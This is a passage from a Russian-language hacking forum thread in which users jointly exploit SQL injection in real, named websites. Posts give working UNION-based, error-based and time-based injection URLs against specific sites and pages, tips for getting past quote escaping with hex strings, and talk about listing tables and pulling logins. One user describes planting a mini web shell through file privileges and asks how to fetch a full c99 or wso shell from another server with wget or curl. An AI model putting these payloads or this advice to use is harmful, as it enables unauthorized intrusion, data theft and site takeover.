24.07.2014, 02:30
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Сообщение от mailbrush
Если имеется ввиду "--" как однострочный коммент, то в MySQL для корректной обработки запроса использование пробела в конце обязательно.
mailbrush,Вам тоже лучше не отвечать, когда не знаете правильного ответа на вопрос. Всем лучше не отвечать, и тем более не спорить.
После -- по документации обязательно наличие пробельного символа, но не пробела. Кроме того, "--" может работать и без него:
Код:
SELECT * FROM information_schema.tables WHERE uid=1--/**/and id=3;
Сообщение от billybonse
Таблицы и колонки вывел нормально, а когда сформировал запрос, дал ошибку. Хоть убейте, не могу понять с чем это связано. На mod_security вроде не похоже.
Запутался, а на какие ваши вопросы ещё нужны ответы и к какому относится этот ответ?
То, что таблицы не существует возможно связано с тем, что имя БД берут из TABLE_SCHEMA, а не database().
|
|
|
24.07.2014, 02:43
|
|
Познающий
Регистрация: 09.10.2011
Сообщений: 55
С нами:
7680566
Репутация:
1
|
|
ok, такой вопрос
опять нашел иньекцию, раскручиваю http://www.site.com/gallery.php?id=-3+union+select+1,table_name,3,4%20from%20informati on_schema.tables%20limit%2040,1%20--
Выдает users
Дальше пишу
http://www.site.com/gallery.php?id=-3+union+select+1,column_name,3,4%20from%20informat ion_schema.columns%20where%20table_name=%27users%2 7%20limit%200,1%20--
Пишет Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/host1222787/xn----itbkhedijai2ag0kya.xn--p1ai/htdocs/www/cgi-bin/gallery.php on line 14
В чем моя ошибка?
|
|
|
|
24.07.2014, 02:52
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
billybonse,Кавычки экранируются, нельзя их использовать стандартным способом в запросе. Если необходимо использовать строку, то используйте HEX (0x...).
При раскрутке обращайте внимание на строку ошибки, возможно запросов несколько.
|
|
|
|
24.07.2014, 02:54
|
|
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
С нами:
7676246
Репутация:
94
|
|
Сообщение от billybonse
ok, такой вопрос
опять нашел иньекцию, раскручиваю http://www.site.com/gallery.php?id=-3+union+select+1,table_name,3,4%20from%20informati on_schema.tables%20limit%2040,1%20--
Выдает users
Дальше пишу
http://www.site.com/gallery.php?id=-3+union+select+1,column_name,3,4%20from%20informat ion_schema.columns%20where%20table_name=%27users%2 7%20limit%200,1%20--
Пишет Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/host1222787/xn----itbkhedijai2ag0kya.xn--p1ai/htdocs/www/cgi-bin/gallery.php on line 14
В чем моя ошибка?
Код:
http://xn----itbkhedijai2ag0kya.xn--p1ai/gallery.php?id=-3+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()--
Тут нет таблицы users.
В соседней базе есть, но она пуста.
|
|
|
|
24.07.2014, 06:31
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Прежде всего, с ходу внесу лепту в старую как мир тему с пробелами посте однострочный mysql-style комментариев. Я, может, и не тяну на уровень гроссмейстеров кавычки с красноточек, но кусок документации об этом уже привели (более того, примерно в этой же теме десятками страниц назад я его уже приводил).
В переводе на простой и всем понятный русский, после mysql-style комментария в виде двух минусов(тире\дефисов?) должен стоять пробельный символ, которым может быть перенос строки, конец строки и вообще вся веселая группа пробельных ascii-символов. Как минимум, это то, что говорит документация, и то, что подтверждается практикой на нескольких mysql-серверах пятой ветки.
Непосредственно же при инъекции пробел ставить иногда не обязательно тупо потому, что необходимый символ уже вставляется в запрос.
Касательно же пустого многострочного комментария - он заменяется на один пробел, что также может использоваться как замена пробелам.
Сообщение от None
Выдает users
Дальше пишу
http://www.site.com/gallery.php?id=-3+union+select+1,column_name,3,4%20from%20informat ion_schema.columns%20where%20table_name=%27users%2 7%20limit%200,1%20--
Пишет Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/host1222787/xn----itbkhedijai2ag0kya.xn--p1ai/htdocs/www/cgi-bin/gallery.php on line 14
В чем моя ошибка?
Таблица, вероятно, из другой базы, ваш же первый запрос выводит только имена.
Сообщение от None
Точно такой же запрос, для получения логина
Цитата:
site.ru/?page=19 and(select 1 from(select count(*),concat((select (select (select concat(0x27,0x7e,user.login,0x27,0x7e) from `db_site`.user Order by id limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
На что выдает ошибку Subquery returns more than 1 row
Как ни странно, подзапрос возвращает больше одного ряда. Используйте однозначные запросы, лимиты по возможности или concat для объединения.
Сообщение от None
madhatter, спасибо за ответ.
И еще вопрос.
Нашел уязвимость, таблица phpbb_acl_users, колонка user_id
Пишу http://www.site.com/pages.php?id=-10%20union%20select%201,user_id,3,4,5,6,7,8,9,10%2 0from%20phpbb_acl_users%20limit%200,1--
Выдает ошибку Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/mamacass/public_html/pages.php on line 12
Что я делаю не так?
Запрос завернулся в false - ошибка при выполнении. |
|
|
|
24.07.2014, 11:20
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами:
8258006
Репутация:
25
|
|
http://www.grc.tomsk.ru/
уязвимость в post параметре vote[2][]=6
time based, дальше определения имени базы "u87_sql1" неичего не получается, помогите разобраться
|
|
|
|
24.07.2014, 14:44
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
Сообщение от Br@!ns
http://www.grc.tomsk.ru/
уязвимость в post параметре vote[2][]=6
time based, дальше определения имени базы "u87_sql1" неичего не получается, помогите разобраться
Запрос имеет вид, дальше не крутил
6' and if(ascii(substring((database()),5,1))
|
|
|
|
24.07.2014, 20:21
|
|
Постоянный
Регистрация: 22.11.2010
Сообщений: 545
С нами:
8142806
Репутация:
324
|
|
Cтолкнулся с проблемой.
Залил минишелл через скулю с file_priv
пытаюсь залиться нормально.
Include - неработает
copy - неработает
file_put_contents - не работает
wget и curl тодже не работают
wget создает пустые файлы curl вообще ничего не создает.
Возможно едо в кривости рук.
Но поскажите ещё функции чтоли через которые можно скопировать код шелла с другого сервера в файл.
|
|
|
|
24.07.2014, 20:32
|
|
Постоянный
Регистрация: 22.11.2010
Сообщений: 545
С нами:
8142806
Репутация:
324
|
|
php 4 ветки phpinfo с xss
смог заинклудить c99 а wso никак не хочет выскаквает ошибка синтаксиса какаято.
|
|
|
|
25.07.2014, 23:50
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
Сообщение от XAMEHA
mailbrush,Вам тоже лучше не отвечать, когда не знаете правильного ответа на вопрос. Всем лучше не отвечать, и тем более не спорить.
После -- по документации обязательно наличие пробельного символа,
но не пробела
. Кроме того, "--" может работать и без него:
Код:
SELECT * FROM information_schema.tables WHERE uid=1--/**/and id=3;
Запутался, а на какие ваши вопросы ещё нужны ответы и к какому относится этот ответ?
То, что таблицы не существует возможно связано с тем, что имя БД берут из TABLE_SCHEMA, а не database(). From a “-- ” sequence to the end of the line. In MySQL, the “-- ” (double-dash) comment style requires the second dash to be followed by at least one whitespace or control character (such as a space, tab, newline, and so on).
ХАМЕНА, Вы пишете бред: white + space это так же " "
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
